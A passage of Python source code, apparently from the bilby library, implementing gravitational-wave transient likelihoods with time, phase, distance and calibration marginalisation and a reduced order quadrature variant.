times = create_time_series(
sampling_frequency=16384,
starting_time=self.parameters['geocent_time'] - self.waveform_generator.start_time,
duration=self.waveform_generator.duration)
times = times % self.waveform_generator.duration
times += self.waveform_generator.start_time
prior = self.priors["geocent_time"]
in_prior = (times >= prior.minimum) & (times < prior.maximum)
times = times[in_prior]
n_time_steps = int(self.waveform_generator.duration * 16384)
d_inner_h = np.zeros(len(times), dtype=complex)
psd = np.ones(n_time_steps)
signal_long = np.zeros(n_time_steps, dtype=complex)
data = np.zeros(n_time_steps, dtype=complex)
h_inner_h = np.zeros(1)
for ifo in self.interferometers:
ifo_length = len(ifo.frequency_domain_strain)
mask = ifo.frequency_mask
signal = ifo.get_detector_response(
signal_polarizations, self.parameters)
signal_long[:ifo_length] = signal
data[:ifo_length] = np.conj(ifo.frequency_domain_strain)
psd[:ifo_length][mask] = ifo.power_spectral_density_array[mask]
d_inner_h += np.fft.fft(signal_long * data / psd)[in_prior]
h_inner_h += ifo.optimal_snr_squared(signal=signal).real
if self.distance_marginalization:
time_log_like = self.distance_marginalized_likelihood(
d_inner_h, h_inner_h)
elif self.phase_marginalization:
time_log_like = ln_i0(abs(d_inner_h)) - h_inner_h.real / 2
else:
time_log_like = (d_inner_h.real - h_inner_h.real / 2)
time_prior_array = self.priors['geocent_time'].prob(times)
time_post = (
np.exp(time_log_like - max(time_log_like)) * time_prior_array)
keep = (time_post > max(time_post) / 1000)
if sum(keep) < 3:
keep[1:-1] = keep[1:-1] | keep[2:] | keep[:-2]
time_post = time_post[keep]
times = times[keep]
new_time = Interped(times, time_post).sample()
return new_time
def generate_distance_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for luminosity
distance when using a likelihood which explicitly marginalises over
distance.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Note: These are rescaled in place after the distance sample is
generated to allow further parameter reconstruction to occur.
Returns
=======
new_distance: float
Sample from the distance posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
d_inner_h_dist = (
d_inner_h * self.parameters['luminosity_distance'] /
self._distance_array)
h_inner_h_dist = (
h_inner_h * self.parameters['luminosity_distance']**2 /
self._distance_array**2)
if self.phase_marginalization:
distance_log_like = (
ln_i0(abs(d_inner_h_dist)) -
h_inner_h_dist.real / 2
)
else:
distance_log_like = (d_inner_h_dist.real - h_inner_h_dist.real / 2)
distance_post = (np.exp(distance_log_like - max(distance_log_like)) *
self.distance_prior_array)
new_distance = Interped(
self._distance_array, distance_post).sample()
self._rescale_signal(signal_polarizations, new_distance)
return new_distance
def _calculate_inner_products(self, signal_polarizations):
d_inner_h = 0
h_inner_h = 0
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
signal_polarizations, interferometer)
d_inner_h += per_detector_snr.d_inner_h
h_inner_h += per_detector_snr.optimal_snr_squared
return d_inner_h, h_inner_h
def generate_phase_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for phase when
using a likelihood which explicitly marginalises over phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_phase: float
Sample from the phase posterior.
Notes
=====
This is only valid when assumes that mu(phi) \propto exp(-2i phi).
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
phases = np.linspace(0, 2 * np.pi, 101)
phasor = np.exp(-2j * phases)
phase_log_post = d_inner_h * phasor - h_inner_h / 2
phase_post = np.exp(phase_log_post.real - max(phase_log_post.real))
new_phase = Interped(phases, phase_post).sample()
return new_phase
def distance_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h_ref, h_inner_h_ref = self._setup_rho(
d_inner_h, h_inner_h)
if self.phase_marginalization:
d_inner_h_ref = np.abs(d_inner_h_ref)
else:
d_inner_h_ref = np.real(d_inner_h_ref)
return self._interp_dist_margd_loglikelihood(
d_inner_h_ref, h_inner_h_ref)
def phase_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h = ln_i0(abs(d_inner_h))
if self.calibration_marginalization and self.time_marginalization:
return d_inner_h - np.outer(h_inner_h, np.ones(np.shape(d_inner_h)[1])) / 2
else:
return d_inner_h - h_inner_h / 2
def time_marginalized_likelihood(self, d_inner_h_tc_array, h_inner_h):
if self.distance_marginalization:
log_l_tc_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_tc_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array,
h_inner_h=h_inner_h)
else:
log_l_tc_array = np.real(d_inner_h_tc_array) - h_inner_h / 2
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
time_prior_array = self.priors['geocent_time'].prob(times) * self._delta_tc
return logsumexp(log_l_tc_array, b=time_prior_array)
def time_and_calibration_marginalized_likelihood(self, d_inner_h_array, h_inner_h):
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
_time_prior = self.priors['geocent_time']
time_mask = np.logical_and((times >= _time_prior.minimum), (times <= _time_prior.maximum))
times = times[time_mask]
time_probs = self.priors['geocent_time'].prob(times) * self._delta_tc
d_inner_h_array = d_inner_h_array[:, time_mask]
h_inner_h = h_inner_h
if self.distance_marginalization:
log_l_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=h_inner_h)
else:
log_l_array = np.real(d_inner_h_array) - np.outer(h_inner_h, np.ones(np.shape(d_inner_h_array)[1])) / 2
prior_array = np.outer(time_probs, 1. / self.number_of_response_curves * np.ones(len(h_inner_h))).T
return logsumexp(log_l_array, b=prior_array)
def get_calibration_log_likelihoods(self, signal_polarizations=None):
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations =\
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=signal_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
d_inner_h_array += per_detector_snr.d_inner_h_array
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=optimal_snr_squared_array)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
else:
log_l_cal_array = np.real(d_inner_h_array - optimal_snr_squared_array / 2)
return log_l_cal_array
def calibration_marginalized_likelihood(self, d_inner_h_calibration_array, h_inner_h):
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array,
h_inner_h=h_inner_h)
else:
log_l_cal_array = np.real(d_inner_h_calibration_array - h_inner_h / 2)
return logsumexp(log_l_cal_array) - np.log(self.number_of_response_curves)
def _setup_rho(self, d_inner_h, optimal_snr_squared):
optimal_snr_squared_ref = (optimal_snr_squared.real *
self.parameters['luminosity_distance'] ** 2 /
self._ref_dist ** 2.)
d_inner_h_ref = (d_inner_h * self.parameters['luminosity_distance'] /
self._ref_dist)
return d_inner_h_ref, optimal_snr_squared_ref
def log_likelihood(self):
return self.log_likelihood_ratio() + self.noise_log_likelihood()
@property
def _delta_distance(self):
return self._distance_array[1] - self._distance_array[0]
@property
def _dist_multiplier(self):
''' Maximum value of ref_dist/dist_array '''
return self._ref_dist / self._distance_array[0]
@property
def _optimal_snr_squared_ref_array(self):
""" Optimal filter snr at fiducial distance of ref_dist Mpc """
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[0])
@property
def _d_inner_h_ref_array(self):
""" Matched filter snr at fiducial distance of ref_dist Mpc """
if self.phase_marginalization:
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[1])
else:
n_negative = self._dist_margd_loglikelihood_array.shape[1] // 2
n_positive = self._dist_margd_loglikelihood_array.shape[1] - n_negative
return np.hstack((
-np.logspace(3, -3, n_negative), np.logspace(-3, 10, n_positive)
))
def _setup_distance_marginalization(self, lookup_table=None):
if isinstance(lookup_table, str) or lookup_table is None:
self.cached_lookup_table_filename = lookup_table
lookup_table = self.load_lookup_table(
self.cached_lookup_table_filename)
if isinstance(lookup_table, dict):
if self._test_cached_lookup_table(lookup_table):
self._dist_margd_loglikelihood_array = lookup_table[
'lookup_table']
else:
self._create_lookup_table()
else:
self._create_lookup_table()
self._interp_dist_margd_loglikelihood = UnsortedInterp2d(
self._d_inner_h_ref_array, self._optimal_snr_squared_ref_array,
self._dist_margd_loglikelihood_array, kind='cubic', fill_value=-np.inf)
@property
def cached_lookup_table_filename(self):
if self._lookup_table_filename is None:
self._lookup_table_filename = (
'.distance_marginalization_lookup.npz')
return self._lookup_table_filename
@cached_lookup_table_filename.setter
def cached_lookup_table_filename(self, filename):
if isinstance(filename, str):
if filename[-4:] != '.npz':
filename += '.npz'
self._lookup_table_filename = filename
def load_lookup_table(self, filename):
if os.path.exists(filename):
try:
loaded_file = dict(np.load(filename))
except AttributeError as e:
logger.warning(e)
self._create_lookup_table()
return None
match, failure = self._test_cached_lookup_table(loaded_file)
if match:
logger.info('Loaded distance marginalisation lookup table from '
'{}.'.format(filename))
return loaded_file
else:
logger.info('Loaded distance marginalisation lookup table does '
'not match for {}.'.format(failure))
elif isinstance(filename, str):
logger.info('Distance marginalisation file {} does not '
'exist'.format(filename))
return None
def cache_lookup_table(self):
np.savez(self.cached_lookup_table_filename,
distance_array=self._distance_array,
prior_array=self.distance_prior_array,
lookup_table=self._dist_margd_loglikelihood_array,
reference_distance=self._ref_dist,
phase_marginalization=self.phase_marginalization)
def _test_cached_lookup_table(self, loaded_file):
pairs = dict(
distance_array=self._distance_array,
prior_array=self.distance_prior_array,
reference_distance=self._ref_dist,
phase_marginalization=self.phase_marginalization)
for key in pairs:
if key not in loaded_file:
return False, key
elif not np.array_equal(np.atleast_1d(loaded_file[key]),
np.atleast_1d(pairs[key])):
return False, key
return True, None
def _create_lookup_table(self):
""" Make the lookup table """
from tqdm.auto import tqdm
logger.info('Building lookup table for distance marginalisation.')
self._dist_margd_loglikelihood_array = np.zeros((400, 800))
scaling = self._ref_dist / self._distance_array
d_inner_h_array_full = np.outer(self._d_inner_h_ref_array, scaling)
h_inner_h_array_full = np.outer(self._optimal_snr_squared_ref_array, scaling ** 2)
if self.phase_marginalization:
d_inner_h_array_full = ln_i0(abs(d_inner_h_array_full))
prior_term = self.distance_prior_array * self._delta_distance
for ii, optimal_snr_squared_array in tqdm(
enumerate(h_inner_h_array_full), total=len(self._optimal_snr_squared_ref_array)
):
for jj, d_inner_h_array in enumerate(d_inner_h_array_full):
self._dist_margd_loglikelihood_array[ii][jj] = logsumexp(
d_inner_h_array - optimal_snr_squared_array / 2,
b=prior_term
)
log_norm = logsumexp(
0 / self._distance_array, b=self.distance_prior_array * self._delta_distance
)
self._dist_margd_loglikelihood_array -= log_norm
self.cache_lookup_table()
def _setup_phase_marginalization(self, min_bound=-5, max_bound=10):
logger.warning(
"The _setup_phase_marginalization method is deprecated and will be removed, "
"please update the implementation of phase marginalization "
"to use bilby.gw.utils.ln_i0"
)
@staticmethod
def _bessel_function_interped(xx):
logger.warning(
"The _bessel_function_interped method is deprecated and will be removed, "
"please update the implementation of phase marginalization "
"to use bilby.gw.utils.ln_i0"
)
return ln_i0(xx) + xx
def _setup_time_marginalization(self):
self._delta_tc = 2 / self.waveform_generator.sampling_frequency
self._times =\
self.interferometers.start_time + np.linspace(
0, self.interferometers.duration,
int(self.interferometers.duration / 2 *
self.waveform_generator.sampling_frequency + 1))[1:]
self.time_prior_array = \
self.priors['geocent_time'].prob(self._times) * self._delta_tc
def _setup_calibration_marginalization(self, calibration_lookup_table):
if calibration_lookup_table is None:
calibration_lookup_table = {}
self.calibration_draws = {}
self.calibration_abs_draws = {}
self.calibration_parameter_draws = {}
for interferometer in self.interferometers:
# Force the priors
calibration_priors = PriorDict()
for key in self.priors.keys():
if 'recalib' in key and interferometer.name in key:
calibration_priors[key] = copy.copy(self.priors[key])
self.priors[key] = DeltaFunction(0.0)
# If there is no entry in the lookup table, make an empty one
if interferometer.name not in calibration_lookup_table.keys():
calibration_lookup_table[interferometer.name] =\
f'{interferometer.name}_calibration_file.h5'
# If the interferometer lookup table file exists, generate the curves from it
if os.path.exists(calibration_lookup_table[interferometer.name]):
self.calibration_draws[interferometer.name] =\
calibration.read_calibration_file(
calibration_lookup_table[interferometer.name], self.interferometers.frequency_array,
self.number_of_response_curves, self.starting_index)
else: # generate the fake curves
from tqdm.auto import tqdm
self.calibration_parameter_draws[interferometer.name] =\
pd.DataFrame(calibration_priors.sample(self.number_of_response_curves))
self.calibration_draws[interferometer.name] = \
np.zeros((self.number_of_response_curves, len(interferometer.frequency_array)), dtype=complex)
for i in tqdm(range(self.number_of_response_curves)):
self.calibration_draws[interferometer.name][i, :] =\
interferometer.calibration_model.get_calibration_factor(
interferometer.frequency_array,
prefix='recalib_{}_'.format(interferometer.name),
**self.calibration_parameter_draws[interferometer.name].iloc[i])
calibration.write_calibration_file(
calibration_lookup_table[interferometer.name],
self.interferometers.frequency_array,
self.calibration_draws[interferometer.name],
self.calibration_parameter_draws[interferometer.name])
interferometer.calibration_model = calibration.Recalibrate()
_mask = interferometer.frequency_mask
self.calibration_draws[interferometer.name] = self.calibration_draws[interferometer.name][:, _mask]
self.calibration_abs_draws[interferometer.name] =\
np.abs(self.calibration_draws[interferometer.name])**2
@property
def interferometers(self):
return self._interferometers
@interferometers.setter
def interferometers(self, interferometers):
self._interferometers = InterferometerList(interferometers)
def _rescale_signal(self, signal, new_distance):
for mode in signal:
signal[mode] *= self._ref_dist / new_distance
@property
def reference_frame(self):
return self._reference_frame
@property
def _reference_frame_str(self):
if isinstance(self.reference_frame, str):
return self.reference_frame
else:
return "".join([ifo.name for ifo in self.reference_frame])
@reference_frame.setter
def reference_frame(self, frame):
if frame == "sky":
self._reference_frame = frame
elif isinstance(frame, InterferometerList):
self._reference_frame = frame[:2]
elif isinstance(frame, list):
self._reference_frame = InterferometerList(frame[:2])
elif isinstance(frame, str):
self._reference_frame = InterferometerList([frame[:2], frame[2:4]])
else:
raise ValueError("Unable to parse reference frame {}".format(frame))
def get_sky_frame_parameters(self):
time = self.parameters['{}_time'.format(self.time_reference)]
if not self.reference_frame == "sky":
ra, dec = zenith_azimuth_to_ra_dec(
self.parameters['zenith'], self.parameters['azimuth'],
time, self.reference_frame)
else:
ra = self.parameters["ra"]
dec = self.parameters["dec"]
if "geocent" not in self.time_reference:
geocent_time = (
time - self.reference_ifo.time_delay_from_geocenter(
ra=ra, dec=dec, time=time
)
)
else:
geocent_time = self.parameters["geocent_time"]
return dict(ra=ra, dec=dec, geocent_time=geocent_time)
@property
def lal_version(self):
try:
from lal import git_version, __version__
lal_version = str(__version__)
logger.info("Using lal version {}".format(lal_version))
lal_git_version = str(git_version.verbose_msg).replace("\n", ";")
logger.info("Using lal git version {}".format(lal_git_version))
return "lal_version={}, lal_git_version={}".format(lal_version, lal_git_version)
except (ImportError, AttributeError):
return "N/A"
@property
def lalsimulation_version(self):
try:
from lalsimulation import git_version, __version__
lalsim_version = str(__version__)
logger.info("Using lalsimulation version {}".format(lalsim_version))
lalsim_git_version = str(git_version.verbose_msg).replace("\n", ";")
logger.info("Using lalsimulation git version {}".format(lalsim_git_version))
return "lalsimulation_version={}, lalsimulation_git_version={}".format(lalsim_version, lalsim_git_version)
except (ImportError, AttributeError):
return "N/A"
@property
def meta_data(self):
return dict(
interferometers=self.interferometers.meta_data,
time_marginalization=self.time_marginalization,
phase_marginalization=self.phase_marginalization,
distance_marginalization=self.distance_marginalization,
calibration_marginalization=self.calibration_marginalization,
waveform_generator_class=self.waveform_generator.__class__,
waveform_arguments=self.waveform_generator.waveform_arguments,
frequency_domain_source_model=self.waveform_generator.frequency_domain_source_model,
parameter_conversion=self.waveform_generator.parameter_conversion,
sampling_frequency=self.waveform_generator.sampling_frequency,
duration=self.waveform_generator.duration,
start_time=self.waveform_generator.start_time,
time_reference=self.time_reference,
reference_frame=self._reference_frame_str,
lal_version=self.lal_version,
lalsimulation_version=self.lalsimulation_version)
class BasicGravitationalWaveTransient(Likelihood):
def __init__(self, interferometers, waveform_generator):
"""
A likelihood object, able to compute the likelihood of the data given
some model parameters
The simplest frequency-domain gravitational wave transient likelihood. Does
not include distance/phase marginalization.
Parameters
==========
interferometers: list
A list of `bilby.gw.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: bilby.gw.waveform_generator.WaveformGenerator
An object which computes the frequency-domain strain of the signal,
given some set of parameters
"""
super(BasicGravitationalWaveTransient, self).__init__(dict())
self.interferometers = interferometers
self.waveform_generator = waveform_generator
def __repr__(self):
return self.__class__.__name__ + '(interferometers={},\n\twaveform_generator={})'\
.format(self.interferometers, self.waveform_generator)
def noise_log_likelihood(self):
""" Calculates the real part of noise log-likelihood
Returns
=======
float: The real part of the noise log likelihood
"""
log_l = 0
for interferometer in self.interferometers:
log_l -= 2. / self.waveform_generator.duration * np.sum(
abs(interferometer.frequency_domain_strain) ** 2 /
interferometer.power_spectral_density_array)
return log_l.real
def log_likelihood(self):
""" Calculates the real part of log-likelihood value
Returns
=======
float: The real part of the log likelihood
"""
log_l = 0
waveform_polarizations =\
self.waveform_generator.frequency_domain_strain(
self.parameters.copy())
if waveform_polarizations is None:
return np.nan_to_num(-np.inf)
for interferometer in self.interferometers:
log_l += self.log_likelihood_interferometer(
waveform_polarizations, interferometer)
return log_l.real
def log_likelihood_interferometer(self, waveform_polarizations,
interferometer):
"""
Parameters
==========
waveform_polarizations: dict
Dictionary containing the desired waveform polarization modes and the related strain
interferometer: bilby.gw.detector.Interferometer
The Interferometer object we want to have the log-likelihood for
Returns
=======
float: The real part of the log-likelihood for this interferometer
"""
signal_ifo = interferometer.get_detector_response(
waveform_polarizations, self.parameters)
log_l = - 2. / self.waveform_generator.duration * np.vdot(
interferometer.frequency_domain_strain - signal_ifo,
(interferometer.frequency_domain_strain - signal_ifo) /
interferometer.power_spectral_density_array)
return log_l.real
class ROQGravitationalWaveTransient(GravitationalWaveTransient):
"""A reduced order quadrature likelihood object
This uses the method described in Smith et al., (2016) Phys. Rev. D 94,
044031. A public repository of the ROQ data is available from
https://git.ligo.org/lscsoft/ROQ_data.
Parameters
==========
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal,
given some set of parameters
linear_matrix: str, array_like
Either a string point to the file from which to load the linear_matrix
array, or the array itself.
quadratic_matrix: str, array_like
Either a string point to the file from which to load the
quadratic_matrix array, or the array itself.
roq_params: str, array_like
Parameters describing the domain of validity of the ROQ basis.
roq_params_check: bool
If true, run tests using the roq_params to check the prior and data are
valid for the ROQ
roq_scale_factor: float
The ROQ scale factor used.
priors: dict, bilby.prior.PriorDict
A dictionary of priors containing at least the geocent_time prior
Warning: when using marginalisation the dict is overwritten which will change the
the dict you are passing in. If this behaviour is undesired, pass `priors.copy()`.
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array,
(distance) prior_array, and reference_distance used to construct
the table.
If a string the name of a file containing these quantities.
The lookup table is stored after construction in either the
provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- "sky": sample in RA/dec, this is the default
- e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
sample in azimuth and zenith, `azimuth` and `zenith` defined in the
frame where the z-axis is aligned the the vector connecting H1
and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- "geocent"/"geocenter": sample in the time at the Earth's center,
this is the default
- e.g., "H1": sample in the time of arrival at H1
"""
def __init__(
self, interferometers, waveform_generator, priors,
weights=None, linear_matrix=None, quadratic_matrix=None,
roq_params=None, roq_params_check=True, roq_scale_factor=1,
distance_marginalization=False, phase_marginalization=False,
distance_marginalization_lookup_table=None,
reference_frame="sky", time_reference="geocenter"
):
super(ROQGravitationalWaveTransient, self).__init__(
interferometers=interferometers,
waveform_generator=waveform_generator, priors=priors,
distance_marginalization=distance_marginalization,
phase_marginalization=phase_marginalization,
time_marginalization=False,
distance_marginalization_lookup_table=distance_marginalization_lookup_table,
jitter_time=False,
reference_frame=reference_frame,
time_reference=time_reference
)
self.roq_params_check = roq_params_check
self.roq_scale_factor = roq_scale_factor
if isinstance(roq_params, np.ndarray) or roq_params is None:
self.roq_params = roq_params
elif isinstance(roq_params, str):
self.roq_params_file = roq_params
self.roq_params = np.genfromtxt(roq_params, names=True)
else:
raise TypeError("roq_params should be array or str")
if isinstance(weights, dict):
self.weights = weights
elif isinstance(weights, str):
self.weights = self.load_weights(weights)
else:
self.weights = dict()
if isinstance(linear_matrix, str):
logger.info(
"Loading linear matrix from {}".format(linear_matrix))
linear_matrix = np.load(linear_matrix).T
if isinstance(quadratic_matrix, str):
logger.info(
"Loading quadratic_matrix from {}".format(quadratic_matrix))
quadratic_matrix = np.load(quadratic_matrix).T
self._set_weights(linear_matrix=linear_matrix,
quadratic_matrix=quadratic_matrix)
self.frequency_nodes_linear =\
waveform_generator.waveform_arguments['frequency_nodes_linear']
self.frequency_nodes_quadratic = \
waveform_generator.waveform_arguments['frequency_nodes_quadratic']
def calculate_snrs(self, waveform_polarizations, interferometer):
"""
Compute the snrs for ROQ
Parameters
==========
waveform_polarizations: waveform
interferometer: bilby.gw.detector.Interferometer
"""
f_plus = interferometer.antenna_response(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'], self.parameters['psi'], 'plus')
f_cross = interferometer.antenna_response(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'], self.parameters['psi'], 'cross')
dt = interferometer.time_delay_from_geocenter(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'])
dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
ifo_time = dt_geocent + dt
calib_linear = interferometer.calibration_model.get_calibration_factor(
self.frequency_nodes_linear,
prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
calib_quadratic = interferometer.calibration_model.get_calibration_factor(
self.frequency_nodes_quadratic,
prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
h_plus_linear = f_plus * waveform_polarizations['linear']['plus'] * calib_linear
h_cross_linear = f_cross * waveform_polarizations['linear']['cross'] * calib_linear
h_plus_quadratic = (
f_plus * waveform_polarizations['quadratic']['plus'] * calib_quadratic)
h_cross_quadratic = (
f_cross * waveform_polarizations['quadratic']['cross'] * calib_quadratic)
indices, in_bounds = self._closest_time_indices(
ifo_time, self.weights['time_samples'])
if not in_bounds:
logger.debug("SNR calculation error: requested time at edge of ROQ time samples")
return self._CalculatedSNRs(
d_inner_h=np.nan_to_num(-np.inf), optimal_snr_squared=0,
complex_matched_filter_snr=np.nan_to_num(-np.inf),
d_inner_h_squared_tc_array=None,
d_inner_h_array=None,
optimal_snr_squared_array=None)
d_inner_h_tc_array = np.einsum(
'i,ji->j', np.conjugate(h_plus_linear + h_cross_linear),
self.weights[interferometer.name + '_linear'][indices])
d_inner_h = self._interp_five_samples(
self.weights['time_samples'][indices], d_inner_h_tc_array, ifo_time)
optimal_snr_squared = \
np.vdot(np.abs(h_plus_quadratic + h_cross_quadratic)**2,
self.weights[interferometer.name + '_quadratic'])
with np.errstate(invalid="ignore"):
complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
d_inner_h_squared_tc_array = None
return self._CalculatedSNRs(
d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
complex_matched_filter_snr=complex_matched_filter_snr,
d_inner_h_squared_tc_array=d_inner_h_squared_tc_array,
d_inner_h_array=None,
optimal_snr_squared_array=None)
@staticmethod
def _closest_time_indices(time, samples):
"""
Get the closest five times
Parameters
==========
time: float
Time to check
samples: array-like
Available times
Returns
=======
indices: list
Indices nearest to time
in_bounds: bool
Whether the indices are for valid times
"""
closest = int((time - samples[0]) / (samples[1] - samples[0]))
indices = [closest + ii for ii in [-2, -1, 0, 1, 2]]
in_bounds = (indices[0] >= 0) & (indices[-1] < samples.size)
return indices, in_bounds
@staticmethod
def _interp_five_samples(time_samples, values, time):
"""
Interpolate a function of time with its values at the closest five times.
The algorithm is explained in https://dcc.ligo.org/T2100224.
Parameters
==========
time_samples: array-like
Closest 5 times
values: array-like
The values of the function at closest 5 times
time: float
Time at which the function is calculated
Returns
=======
value: float
The value of the function at the input time
"""
r1 = (-values[0] + 8. * values[1] - 14. * values[2] + 8. * values[3] - values[4]) / 4.
r2 = values[2] - 2. * values[3] + values[4]
a = (time_samples[3] - time) / (time_samples[1] - time_samples[0])
b = 1. - a
c = (a**3. - a) / 6.
d = (b**3. - b) / 6.
return a * values[2] + b * values[3] + c * r1 + d * r2
def perform_roq_params_check(self, ifo=None):
""" Perform checking that the prior and data are valid for the ROQ
Parameters
==========
ifo: bilby.gw.detector.Interferometer
The interferometer
"""
if self.roq_params_check is False:
logger.warning("No ROQ params checking performed")
return
else:
if getattr(self, "roq_params_file", None) is not None:
msg = ("Check ROQ params {} with roq_scale_factor={}"
.format(self.roq_params_file, self.roq_scale_factor))
else:
msg = ("Check ROQ params with roq_scale_factor={}"
.format(self.roq_scale_factor))
logger.info(msg)
roq_params = self.roq_params
roq_minimum_frequency = roq_params['flow'] * self.roq_scale_factor
roq_maximum_frequency = roq_params['fhigh'] * self.roq_scale_factor
roq_segment_length = roq_params['seglen'] / self.roq_scale_factor
roq_minimum_chirp_mass = roq_params['chirpmassmin'] / self.roq_scale_factor
roq_maximum_chirp_mass = roq_params['chirpmassmax'] / self.roq_scale_factor
roq_minimum_component_mass = roq_params['compmin'] / self.roq_scale_factor
if ifo.maximum_frequency > roq_maximum_frequency:
raise BilbyROQParamsRangeError(
"Requested maximum frequency {} larger than ROQ basis fhigh {}"
.format(ifo.maximum_frequency, roq_maximum_frequency))
if ifo.minimum_frequency < roq_minimum_frequency:
raise BilbyROQParamsRangeError(
"Requested minimum frequency {} lower than ROQ basis flow {}"
.format(ifo.minimum_frequency, roq_minimum_frequency))
if ifo.strain_data.duration != roq_segment_length:
raise BilbyROQParamsRangeError(
"Requested duration differs from ROQ basis seglen")
priors = self.priors
if isinstance(priors, CBCPriorDict) is False:
logger.warning("Unable to check ROQ parameter bounds: priors not understood")
return
if priors.minimum_chirp_mass is None:
logger.warning("Unable to check minimum chirp mass ROQ bounds")
elif priors.minimum_chirp_mass < roq_minimum_chirp_mass:
raise BilbyROQParamsRangeError(
"Prior minimum chirp mass {} less than ROQ basis bound {}"
.format(priors.minimum_chirp_mass,
roq_minimum_chirp_mass))
if priors.maximum_chirp_mass is None:
logger.warning("Unable to check maximum_chirp mass ROQ bounds")
elif priors.maximum_chirp_mass > roq_maximum_chirp_mass:
raise BilbyROQParamsRangeError(
"Prior maximum chirp mass {} greater than ROQ basis bound {}"
.format(priors.maximum_chirp_mass,
roq_maximum_chirp_mass))
if priors.minimum_component_mass is None:
logger.warning("Unable to check minimum component mass ROQ bounds")
elif priors.minimum_component_mass < roq_minimum_component_mass:
raise BilbyROQParamsRangeError(
"Prior minimum component mass {} less than ROQ basis bound {}"
.format(priors.minimum_component_mass,
roq_minimum_component_mass))
def _set_weights(self, linear_matrix, quadratic_matrix):
"""
Setup the time-dependent ROQ weights.
See https://dcc.ligo.org/LIGO-T2100125 for the detail of how to compute them.
Parameters
==========
linear_matrix, quadratic_matrix: array_like
Arrays of the linear and quadratic basis
"""
time_space = self._get_time_resolution()
number_of_time_samples = int(self.interferometers.duration / time_space)
try:
import pyfftw
ifft_input = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
ifft_output = pyfftw.empty_aligned(number_of_time_samples, dtype=complex)
ifft = pyfftw.FFTW(ifft_input, ifft_output, direction='FFTW_BACKWARD')
except ImportError:
pyfftw = None
logger.warning("You do not have pyfftw installed, falling back to numpy.fft.")
ifft_input = np.zeros(number_of_time_samples, dtype=complex)
ifft = np.fft.ifft
earth_light_crossing_time = 2 * radius_of_earth / speed_of_light + 5 * time_space
start_idx = max(0, int(np.floor((self.priors['{}_time'.format(self.time_reference)].minimum -
earth_light_crossing_time - self.interferometers.start_time) / time_space)))
end_idx = min(number_of_time_samples - 1, int(np.ceil((
self.priors['{}_time'.format(self.time_reference)].maximum + earth_light_crossing_time -
self.interferometers.start_time) / time_space)))
self.weights['time_samples'] = np.arange(start_idx, end_idx + 1) * time_space
logger.info("Using {} ROQ time samples".format(len(self.weights['time_samples'])))
